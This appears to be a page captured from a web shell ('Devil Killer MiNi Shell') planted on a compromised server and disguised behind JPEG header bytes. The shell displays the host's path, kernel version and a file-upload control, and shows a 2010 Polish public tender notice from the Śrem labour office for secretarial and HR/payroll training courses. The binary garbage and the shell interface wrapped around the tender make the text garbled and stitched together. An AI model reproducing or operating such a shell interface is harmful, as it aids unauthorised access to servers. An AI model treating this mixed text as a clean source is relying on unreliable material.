JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/210793-N-2010.html

<p class="kh_header"><b>Śrem: Przedmiotem zamówienia jest usługa dotycząca zorganizowania i przeprowadzenia szkoleń: A. Pracownik ds. obsługi sekretariatu z nauką języka obcego, B. Pracownik ds. kadrowo-płacowych oraz C. Pracownik ds. obsługi sekretariatu z elementami kadr i płac</b><br>
<b>Numer ogłoszenia: 210793 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Śremie , ul. Adama Mickiewicza 56, 63-100 Śrem, woj. wielkopolskie, tel. 0-61 2837059, faks 0-61 2837075 w. 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.srem.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa dotycząca zorganizowania i przeprowadzenia szkoleń: A. Pracownik ds. obsługi sekretariatu z nauką języka obcego, B. Pracownik ds. kadrowo-płacowych oraz C. Pracownik ds. obsługi sekretariatu z elementami kadr i płac.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Pracownik ds. obsługi sekretariatu z nauką języka obcego
Pracownik ds. obsługi sekretariatu z nauką języka obcego dla grupy 30 osób (2 grupy po 15 osób) posiadających wykształcenie min. średnie oraz znajomość podstaw obsługi komputera i podstaw danego języka. 
Termin wykonania zamówienia: 
I termin - szkolenie dla grupy 15 osób z nauką języka angielskiego III dekada sierpnia/III dekada października 2010r. - szkolenie realizowane w ramach: Program aktywizacji osób do 30 roku życia;
II termin - szkolenie dla grupy 15 osób z nauką języka niemieckiego II dekada września/I dekada listopada 2010r. - szkolenie realizowane w ramach: Program aktywizacji osób do 30 roku życia;

Celem szkolenia jest przygotowanie uczestników do profesjonalnego prowadzenia sekretariatu z umiejętnością prowadzenia spraw kadrowo-płacowych, z uwzględnieniem komunikatywnego języka angielskiego/niemieckiego. 

W zakresie tematycznym szkoleń muszą znaleźć się takie elementy jak: 
1. Zasady organizacji biura i sekretariatu.
2. Zagadnienia kultury i etyki zawodu.
3. Organizacja pracy szefa. 
4. Obsługa narad i spotkań organizowanych przez szefa.
5. Komputeryzacja prac biurowych - Pakiet MS Office (Word, Excel, Power point, Access, poczta elektroniczna) Internet, elektroniczny notes menedżerski, obsługa urządzeń techniki biurowej.
6.Czynności kancelaryjne w sekretariacie. System znakowania, archiwizowania i obiegu dokumentów.
4. Kadry.
5. Płace - wynagrodzenia.
6. ZUS - system ubezpieczeń społecznych, problematyka ZUS.
7. Wykorzystanie komputera- elektroniczna postać kadr i płac.
8. Wykorzystanie komputera- program Płatnik.
9. Wykorzystanie komputera- Internet w otoczeniu kadrowca.
10. Nauka języka angielskiego/niemieckiego.

	Zgodnie z programem kursu na jednego uczestnika przypada około 
275 godzin lekcyjnych szkolenia (1 godzina lekcyjna = 45 minut), w tym około 194 godziny lekcyjne zajęć teoretycznych oraz około 81 godzin zajęć praktycznych w tym 50 godzin praktycznej nauki zawodu realizowanej u pracodawców. Praktyczna nauka zawodu u pracodawcy trwać będzie 5 dni roboczych (8 godzin zegarowych czyli 10 godzin lekcyjnych i 30 minut przerwy dziennie). Wykonawca zapewni każdemu uczestnikowi miejsce odbywania praktycznej nauki zawodu na terenie Śremu.
 Szkolenie powinno odbywać się od poniedziałku do piątku w godzinach od 8:00 do max 16:00. Liczba godzin szkolenia w ciągu tygodnia nie może być mniejsza niż 30 godzin zegarowych (1 godzina zegarowa = 60 minut). Wyżej wymieniony czas trwania szkolenia uwzględnia przerwy. 
Wykonawca zapewni uczestnikom szkolenia poczęstunek:
- w trakcie szkolenia napoje zimne tj. woda, soki,
- w trakcie przerw: kawę, herbatę, cukier, mleko,  ciastka i kanapki. 
Szkolenie powinno odbywać się na terenie Śremu. W przypadku, gdyby szkolenie odbywało się poza Śremem, Wykonawca zapewni dojazd uczestników do miejsca szkolenia oraz z powrotem do Śremu. 
 
Szkolenie będzie prowadzone przez wykwalifikowaną i doświadczoną kadrę dydaktyczną, zarówno podczas zajęć teoretycznych jak i praktycznych. Kurs powinien być oparty o metody wykorzystujące zastosowanie ćwiczeń, przykładów praktycznych w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia.
 
Wykonawca zapewni każdemu uczestnikowi odpowiednio wyposażone stanowisko komputerowe z dostępem do Internetu dla efektywnego zdobywania wiedzy (tj. 15 stanowisk komputerowych dla każdej grupy). 
W przypadku skierowania przez Zamawiającego na szkolenie osób zarejestrowanych jako poszukujące pracy, Wykonawca zobowiązany będzie ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w drodze do i z miejsca szkolenia. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.
Celem dokonania oceny szkolenia, Wykonawca będzie prowadzić dokumentację przebiegu szkolenia:
1. dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych (listę obecności bezrobotni powinni podpisywać w każdym dniu zajęć),
2. rejestr wydanych zaświadczeń i/lub certyfikatów.
Na zakończenie kursu jego uczestnicy winni wypełnić imienną ankietę służącą do oceny szkolenia. 
Po zakończeniu szkolenia uczestnicy otrzymają stosowne zaświadczenie i/lub certyfikat o jego ukończeniu.  

B. Pracownik ds. kadrowo-płacowych
Pracownik ds. kadrowo-płacowych dla grupy 15 osób bezrobotnych, posiadających wykształcenie min. średnie, znających podstawy obsługi komputera.
Termin wykonania zamówienia: III dekada sierpnia/I dekada października 2010r. - szkolenie realizowane w ramach projektu: Bądź gotowy dziś...do zmian, współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Celem szkolenia jest przygotowanie uczestników do wykonywania pracy 
na stanowisku ds. kadr i płac, gdzie niezbędna jest umiejętność obsługi komputerowych programów kadrowo-płacowych oraz programu Płatnik. Kurs ma pomóc w znalezieniu zatrudnienia nie tylko w jednostkach administracyjnych i stanowić ma podstawę do pracy na stanowiskach biurowych.

W zakresie tematycznym szkolenia muszą znaleźć się takie elementy jak:
1. Kadry.
2. Płace - wynagrodzenia.
3. ZUS - system ubezpieczeń społecznych, problematyka ZUS.
4. Wykorzystanie komputera - elektroniczna postać kadr i płac (program komputerowy do obsługi Kadr i Płac).
5. Wykorzystanie komputera - program Płatnik.
6. Wykorzystanie komputera - Internet w otoczeniu kadrowca.
7. Aktywne formy poszukiwanie pracy.
8. Praktyczna nauka zawodu.

Szkolenie składa się z zajęć szkoleniowych oraz praktycznej nauki zawodu realizowanej u pracodawcy. Zgodnie z programem kursu na jednego uczestnika przypada około 270 godzin lekcyjnych szkolenia (1 godzina lekcyjna = 45 minut), w tym:
- około 52 godziny lekcyjne zajęć teoretycznych (zawierających 10 godzin metod aktywnego poszukiwania pracy), 
- około 218 godzin lekcyjnych zajęć praktycznych, w tym 78 godzin praktycznych zajęć  szkoleniowych oraz 140 godzin praktycznej nauki zawodu realizowanej 
u pracodawców. Praktyczna nauka zawodu u pracodawcy trwać będzie 10 dni roboczych (8 godzin zegarowych czyli 10 godzin lekcyjnych i 30 minut przerwy dziennie). Wykonawca zapewni każdemu uczestnikowi miejsce odbywania praktycznej nauki zawodu na terenie Śremu.
Szkolenie powinno odbywać się od poniedziałku do piątku w godzinach od 7:00 do max 17:00. Liczba godzin szkolenia w ciągu tygodnia nie może być mniejsza niż 30 godzin zegarowych (1 godzina zegarowa = 60 minut). Wyżej wymieniony czas trwania zajęć szkoleniowych uwzględnia przerwy w szkoleniu. Wykonawca zapewni uczestnikom szkolenia poczęstunek:
- w trakcie szkolenia napoje zimne tj. woda, soki,
- w trakcie przerw: kawę, herbatę, cukier, mleko,  ciastka i kanapki.
	Szkolenie powinno się odbywać na terenie Śremu. W przypadku, gdyby szkolenie odbywało się poza Śremem, Wykonawca zapewni dojazd uczestników do miejsca szkolenia oraz z powrotem do Śremu.
Szkolenie będzie prowadzone przez wykwalifikowaną kadrę dydaktyczną. Wykonawca zapewni każdemu uczestnikowi odpowiednio wyposażone stanowisko komputerowe z dostępem do Internetu dla efektywnego zdobywania wiedzy (tj. 15 stanowisk komputerowych). Kurs będzie oparty o metody wykorzystujące zastosowanie ćwiczeń, przykładów praktycznych w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia. 
Wykonawca zapewni wykwalifikowaną i doświadczoną kadrę dydaktyczną, również podczas praktycznej nauki zawodu.

C. Pracownik ds. obsługi sekretariatu z elementami kadr i płac
Pracownik ds. obsługi sekretariatu z elementami kadr i płac dla grupy 15 osób bezrobotnych, posiadających wykształcenie min. średnie, znających podstawy obsługi komputera.
Termin wykonania zamówienia: I dekada października/I dekada listopada 2010r. - szkolenie realizowane w ramach projektu: Bądź gotowy dziś...do zmian, współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Celem kursu jest przygotowanie uczestników do profesjonalnego prowadzenia sekretariatu z umiejętnością prowadzenia spraw  kadrowo - płacowych (gdzie niezbędna jest umiejętność obsługi komputerowych programów kadrowo - płacowych oraz programu Płatnik). 
W zakresie tematycznym szkolenia muszą znaleźć się takie elementy jak:
1. Zasady organizacji biura i sekretariatu: co to jest sekretariat?; SEKRETARIAT: 
w strukturze organizacji firmy, w małej firmie prywatnej, w przedsiębiorstwie państwowym, w spółce akcyjnej, w administracji państwowej, w administracji samorządowej; czynności kancelaryjne w sekretariacie, fazy obiegu pism, korespondencja, zarządzanie czasem, szefowie i asystenci, współpracownicy 
i interesanci, rozmowy telefoniczne, delegacje służbowe, krajowe i zagraniczne.
2. Zagadnienia kultury i etyki zawodu: jaki jest ideał pracownika sekretariatu? profesjonalizm pracownika sekretariatu.
3. Komputeryzacja prac biurowych - Pakiet MS Office (Word, Excel, Power point, Access, Poczta elektroniczna, Internet, elektroniczny notes menedżerski, Poznanie obsługi urządzeń techniki biurowej m.in.: fax, kserokopiarka, skaner).
4. Kadry.
5. Płace - wynagrodzenia.
6. ZUS - system ubezpieczeń społecznych, problematyka ZUS.
7. Wykorzystanie komputera - elektroniczna postać kadr i płac.
8. Wykorzystanie komputera - program Płatnik.
9. Wykorzystanie komputera - Internet w otoczeniu kadrowca.

	Zgodnie z programem kursu na jednego uczestnika przypada około 153 godziny lekcyjne szkolenia (1 godzina lekcyjna = 45 minut), w tym 70 godzin lekcyjnych zajęć teoretycznych oraz 83 godziny lekcyjne zajęć praktycznych w tym 50 godzin praktycznej nauki zawodu realizowanej u pracodawców. Praktyczna nauka zawodu u pracodawcy trwać będzie 5 dni roboczych (8 godzin zegarowych czyli 10 godzin lekcyjnych i 30 minut przerwy dziennie). Wykonawca zapewni każdemu uczestnikowi miejsce odbywania praktycznej nauki zawodu na terenie Śremu.
 Szkolenie powinno odbywać się od poniedziałku do piątku w godzinach od 8:00 do max 15:00. Liczba godzin szkolenia w ciągu tygodnia nie może być mniejsza niż 30 godzin zegarowych (1 godzina zegarowa = 60 minut). Wyżej wymieniony czas trwania zajęć szkoleniowych uwzględnia przerwy w szkoleniu. Wykonawca zapewni uczestnikom szkolenia poczęstunek:
- w trakcie szkolenia napoje zimne tj. woda, soki,
- w trakcie przerw: kawę, herbatę, cukier, mleko,  ciastka i kanapki.
Szkolenie powinno się odbywać na terenie Śremu. W przypadku, gdyby szkolenie odbywało się poza Śremem, Wykonawca zapewni dojazd uczestników do miejsca szkolenia oraz z powrotem do Śremu.
Szkolenie będzie prowadzone przez wykwalifikowaną kadrę dydaktyczną. Wykonawca zapewni każdemu uczestnikowi odpowiednio wyposażone stanowisko komputerowe z dostępem do Internetu dla efektywnego zdobywania wiedzy (tj. 15 stanowisk komputerowych). Kurs będzie oparty o metody wykorzystujące zastosowanie ćwiczeń, przykładów praktycznych w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć kopię zaświadczenia o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę Wykonawcy wojewódzki urząd pracy. Zamawiający dokonana weryfikacji wpisu do rejestru instytucji szkoleniowych pod kątem jego aktualności w elektronicznej bazie danych prowadzonej przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa będzie posiadała w rejestrze instytucji szkoleniowych status aktywna na 2010 rok. Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za Wykonawcę posiadającego odpowiednia wiedzę i doświadczenie, zgodnie z art. 22 ust. 1 ustawy, Zamawiający uzna tylko tego Wykonawcę, który w okresie ostatnich 3 lat tj. od 05.08.2010r. do 12.08.2010r. przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, należycie wykonali co najmniej 5 szkoleń z zakresu objętego przedmiotem niniejszego zamówienia. Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował: potencjałem technicznym adekwatnym do przedmiotu zamówienia umożliwiającym realizację szkolenia tj.:
- pomieszczeniami do przeprowadzenia zajęć teoretycznych i praktycznych, których liczba i pojemność jest adekwatna do wielkości grup szkoleniowych,
- będzie dysponował miejscem do odbycia praktycznej nauki zawodu dla każdego uczestnika szkoleń,
- w celu realizacji szkolenia określonego w punkcie A przedmiotu zamówienia będzie dysponował 15 komputerami z dostępem do Internetu niezbędnymi do prawidłowej realizacji szkolenia dla każdej grupy.
- w celu realizacji szkolenia określonego w punkcie B przedmiotu zamówienia będzie dysponował 15 komputerami z dostępem do Internetu niezbędnymi do prawidłowej realizacji szkolenia oraz co najmniej 1 programem komputerowym do obsługi Kadr i Płac.
- w celu realizacji szkolenia określonego w punkcie C przedmiotu zamówienia będzie dysponował 15 komputerami z dostępem do Internetu niezbędnymi do prawidłowej realizacji szkolenia.
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na czas realizacji zamówienia Wykonawca będzie dysponował osobami 
o odpowiednich kwalifikacjach umożliwiających realizację zamówienia, w tym posiadających doświadczenie zawodowe w postaci przeprowadzonych minimum 3 szkoleń grupowych z zakresu tematyki przedmiotu zamówienia w ciągu 2009 roku. Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca, który osiągnął w 2009 roku obrót w wysokości co najmniej 150.000,00 zł (jeżeli okres działalności jest krótszy to minimalna wysokość obrotu powinna być proporcjonalna do okresu prowadzenia działalności). Przez obrót należy rozumieć obrót w rozumieniu ustawy z dnia 11 marca 2004r. 
o podatku od towarów i usług (Dz. U. z 2004r. nr 54, poz. 535 z późn. zm.).
2. Wykonawca, który posiada opłaconą  polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na czas realizacji przedmiotowego zamówienia na kwotę co najmniej 80.000,00 zł.
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Potencjał techniczny - 50</li>
<li>3 - Certyfikat jakości usług - 10</li>
<li>4 - Dokument potwierdzający ukończenie szkolenia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do:
a) zmiany miejsca szkolenia, które można dokonać, gdy wynikają  one z przyczyn losowych, całkowicie niezależnych od Wykonawcy. W związku z powyższym Wykonawca zobowiązany będzie uzyskać pisemną zgodę od Zamawiającego, występując do niego z informacją o zmianie miejsca odbywania szkolenia. W piśmie Wykonawca zobowiązany będzie wskazać przyczyny zmiany miejsca i podać nowe miejsce odbywania zajęć. 
b) Zmiany w harmonogramie realizacji szkolenia, których można będzie dokonać 
w przypadku wystąpienia uzasadnionych okoliczności uniemożliwiających zrealizowanie zamówienia zgodnie z załączonym do umowy harmonogramem. 
W związku z powyższym, Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu pisma uzasadniającego konieczność dokonania zmian wraz ze zmienionym harmonogramem realizacji szkolenia. Zamawiający winien udzielić  pisemnej zgody na zmianę harmonogramu.</p>
